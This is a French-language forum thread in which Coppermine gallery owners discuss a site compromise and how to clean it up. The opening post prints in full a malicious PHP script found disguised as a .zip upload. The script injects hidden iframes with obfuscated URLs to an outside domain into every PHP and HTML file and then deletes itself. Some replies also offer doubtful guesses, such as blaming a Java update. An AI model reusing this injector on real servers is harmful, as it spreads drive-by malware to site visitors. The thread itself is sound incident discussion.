Galerie attaquée ?

[DavidG]

en cherchant un peu sur le serveur, je viens de trouver dans le répertoire albums/userpics/10001 un fichier 142739_298w3.zip qui est en faite un fichier php

voici le contenu :

Code Select Expand

<?php 
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];

return $filetype;
}

function parse($path) {
$dir_array = array();
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) { 
if ($file != "." && $file != "..") { 
$try_dir = $path.$file.'/';
if(is_dir($try_dir)) {
array_push($dir_array, $try_dir);
}
else {
if ($path[strlen($path)-1] != '/') {
$path.= '/';
}
$f_ext = fileExtension($file);
if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
if($file!="debugger.inc.php") {
//chmod($path.$file,0777);
$fhandle = fopen($path.$file, 'a+');
if($f_ext=="php") {
fwrite($fhandle, "<?php echo '<iframe src=\"&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;\" width=1 height=1></iframe>'; ?>");
}
else {
fwrite($fhandle, "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>");
}
fclose($fhandle);
}
}
}
}
}
closedir($handle);
}

return $dir_array;
}

function launch() {
$total = 0;
$last = 1;
$last_num = 0;
$path = $_SERVER['DOCUMENT_ROOT'];
$dirs = array();
array_push($dirs, $path);

while($last) {
$last_num = 0;
for( $j=$total; $j<$total+$last; $j++) {
$temp_dirs = parse($dirs[$j]);
$last_t = sizeof($temp_dirs);
$last_num += $last_t;
for( $i=0; $i<$last_t; $i++) {
array_push($dirs, $temp_dirs[$i]);
}
}
$total += $last;
$last = $last_num;
}
$paths = $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];
unlink($paths);

if (is_file($paths)) {
$fhandle = fopen($paths, 'w');
fwrite($fhandle, "<?php echo'Upload plugins here'; ?>");
fclose($fhandle);
}
}

if (isset($_GET['ff']))
{
echo "~!";
launch();
}
echo '<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>';
?>

[Pascal YAP]

Bonjour,

Là on est tous d'accord, il y a un gros soucis de sécu !
La solution ultime consiste, hélas, à replacer des fichiers propres (Clean) !
N'oubliez pas de remplacer également vos fichiers de plugins, si vous en avez installé !

Il n'y a pas de solution logiciel actuellement....

Wait'n See ( attendre et voir)

PYAP

[mafieuso]

Ah oui j'avais oublié de signaler que j'avais aussi ce fichier zip, je l'ai supprimé sans regarder ce qu'il y avait dedans par peur d'une infection...

[Coline]

Et en le supprimant tu n'as eu aucun problème?
Je voulais savoir comment je fais pour tout remettre à jour en ayant un modded?
Je remet la mise à jour cpg1.4.16 puis le modded?
merci

[mafieuso]

Comme l'a dit Pascal YAP un peu plus haut il faut que tu remplaces les fichiers qui sont sur le FTP, tous les dossiers mis à part le dossier albums.

Si tu as une copie de tous ces fichiers sur ton pc avant l'attaque ça devrait être assez simple sinon il faut que tu télécharges la version que tu as sur le serveur et modifie les fichiers avant de tout retransférer.

[Coline]

J'ai remis la mise à jours cpg1.4.16.zip + le stramm_mod1_4_16_bridge.zip et j'ai toujours ce virus

[becassier.29]

Bon ben apparement la buse c'est faite aussi attaquée.

L'accès à ma galerie bugg, la mise en page est dans les choux, des albums semblent avoir disparus, mais peut être pas les photos.
Un membre m'avait signalé la présence d'un virus (dont je me rappelle plus le nom) à l'ouverture de la galerie. Cette après midi j'avais pu y aller, mais ce soir c'est dur dur. Pas moyen de m'identifier, ça bugg avant.

Très grosse galère pour moi à la mise en place de cette galerie, voilà que maintenant ça merdouille..................... :-\

:'(

[sanlogik]

vous me faites peur avé vos histoires là...
du coup sauvegarde "express" (façon de parler) des fichiers du serveur, lol

[becassier.29]

Pour mon cas j'a itélécharger récement une nouvelle version de Java Sun, Comme apparement Coppermine tourne avec ça le problème ne viendrait il pas de là?

[mr.goose]

Bonjour,

Pardon mon mauvais français, parce que je suis anglais. Mais nous avons le même problème ici:-
http://forum.coppermine-gallery.net/index.php/topic,51671.0.html

G.

[DavidG]

Merci pour l'info mr.goose.

[Feerie21]

Pour ma part tout semble être régler, jai remplacer tous les fichier par des fichier "propres". Supprimer le "fichier zip" qui avait été uploader et qui semplait être une des cause de ce big bug, activer l'inscription des utilisateur avant acces a la galerie. Et tout marche correctement pour le moment. Je croise les doigts pour que ca continue. Merci pour tous vos conseils en tout cas

[Coline]

J'ai également tous enlevé (sauf album) et tous remis et le virus c'est envolé ouf! je suis soulagée

[Feerie21]

J'ai parler trop vite, maitenant il met impossible d'uploader un fichier que ce soit manuellement ou en passant par FTP. 

[becassier.29]

Des virus semblent être dans le update de la nouvelle version de java. Mon antivirus m'en sort a chaque voit que je tente de me connecter a ma galerie.

[mafieuso]

J'ai également tous enlevé (sauf album) et tous remis et le virus c'est envolé ouf! je suis soulagée

Juste un petit détail dans chaque dossier d'images donc sous-dossiers de albums il y a normalement un fichier index.html qui est vide (juste pour éviter que quelqu'un se ballade dans le répertoire) or après l'attaque il y a dedans cette fameuse ligne de code bizarre, donc il si tu veux que ce soit complètement propre il te faut remplacer le index.html modifié par un fichier index.html vide (un simple fichier txt renommé fera l'affaire) dans chaque sous-dossier, c'est un peu long car il faut le faire manuellement mais bon ça vaut le coup à mon avis !

[dorifort]

bonjour à tous, jai subit le même sort sur l'une de mes galerie  bon je dois dire quant même que cette attaque et ce problème n'est pas du cas coppermine  mais à tout un tas de galerie ou CMS utilisant du code, ce sont tous les fichier index.php qui sont touché, donc le seul reméde à faire c'est de remplacer tous les fichiers index.php de votre CMS ou de votre galerie photo et vérifier le dossier /albums/userpics/ dedans l'on trouve un dossier par exemple ici /10001/ il correspont au upload effectué pour la galerie à l'intérieur de celui il y à peut être un zip virer le  voila ) un bon conseil aussi heureusement que j'avais installé le plugins de sauvegarde, une fois votre nettoyage fait tout reviens d'en l odre 
comment sa viens la dedans ou comment il peuvent changer les fichier index.php de nos galerie ou CMS j'en sais rien du tout 

bonne fin de journéé à tous

[Pascal YAP]

ce sont tous les fichier index.php qui sont touché

Exact !
Mais pour être plus précis encore, se sont hélas TOUS les fichiers qui sont modifiés !
Idem pour les HTML du site. Idem pour les Plugin de Coppermine...

Même le fichier CONFIG.INC.PHP est touché Qui est rappelons-le le cœur de Coppermine !

Il faut remplacer tous les fichiers de vos sites. C'est l'occasion pour faire une mise à jour 1.4.16 actuellement.

Mr.Goose signale ce Sujet en anglais (http://forum.coppermine-gallery.net/index.php/topic,51671.0.html) dans lequel il signale la présence suspect d'un fichier ZIP nommé comme ceci : 142739_298w3.zip
Perso n'ai pas trouvé ce fichier sur mon serveur !

PYAP

[dorifort]

oui c'est bizarre, je viens aussi de poser la question sur le forum de guppy pour ce CMS on me dis faut le mettre à jour et que la faille étais connue, euh sauf que mon guppy était à jour au dernier crie, donc tu voi y à bien pour moi aussi des CMS qui sont touché  :-\ pour la galerie directement je me suis rendu ici pour voir si vous en parliez un peu  encore des clowns qui non rien d'autre à faire que d'emmerder des gens qui vienne partager ici ou la l'une de leur petite passion grace à nos galerie   
cordialement, alain

[Pascal YAP]

Une vulnérabilité dans le fichier UPLOAD.PHP a été déceller.
Le fix est en TEST actuellement.
Mais déjà, il est possible de ne pas proposer la fonction URL/URI dans votre Galerie.

PYAP